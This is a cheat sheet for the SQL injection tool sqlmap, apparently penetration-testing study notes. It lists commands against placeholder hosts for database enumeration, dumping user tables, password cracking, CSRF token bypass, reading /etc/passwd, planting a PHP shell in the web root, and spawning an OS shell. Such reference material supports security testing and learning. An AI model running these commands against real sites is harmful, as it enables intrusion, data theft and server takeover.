SQLmap Cheatsheet

Last updated 3 years ago

Command 	Description
sqlmap -h 	View the basic help menu
sqlmap -hh 	View the advanced help menu
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch 	Run SQLMap without asking for user input
sqlmap 'http://www.example.com/' --data 'uid=1&name=test' 	SQLMap with POST request
sqlmap 'http://www.example.com/' --data 'uid=1*&name=test' 	POST request specifying an injection point with an asterisk
sqlmap -r req.txt 	Passing an HTTP request file to SQLMap
sqlmap ... --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c' 	Specifying a cookie header
sqlmap -u www.target.com --data='id=1' --method PUT 	Specifying a PUT request
sqlmap -u "http://www.target.com/vuln.php?id=1" --batch -t /tmp/traffic.txt 	Store traffic to an output file
sqlmap -u "http://www.target.com/vuln.php?id=1" -v 6 --batch 	Specify verbosity level
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -" 	Specifying a prefix or suffix
sqlmap -u www.example.com/?id=1 -v 3 --level=5 	Specifying the level (risk is set separately with --risk)
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba 	Basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --tables -D testdb 	Table enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname 	Table/row enumeration
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb --where="name LIKE 'f%'" 	Conditional enumeration
sqlmap -u "http://www.example.com/?id=1" --schema 	Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --search -T user 	Searching for data
sqlmap -u "http://www.example.com/?id=1" --passwords --batch 	Password enumeration and cracking
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token" 	Anti-CSRF token bypass
sqlmap --list-tampers 	List all tamper scripts
sqlmap -u "http://www.example.com/case1.php?id=1" --is-dba 	Check for DBA privileges
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd" 	Reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php" 	Writing a file
sqlmap -u "http://www.example.com/?id=1" --os-shell 	Spawning an OS shell
Hacktricks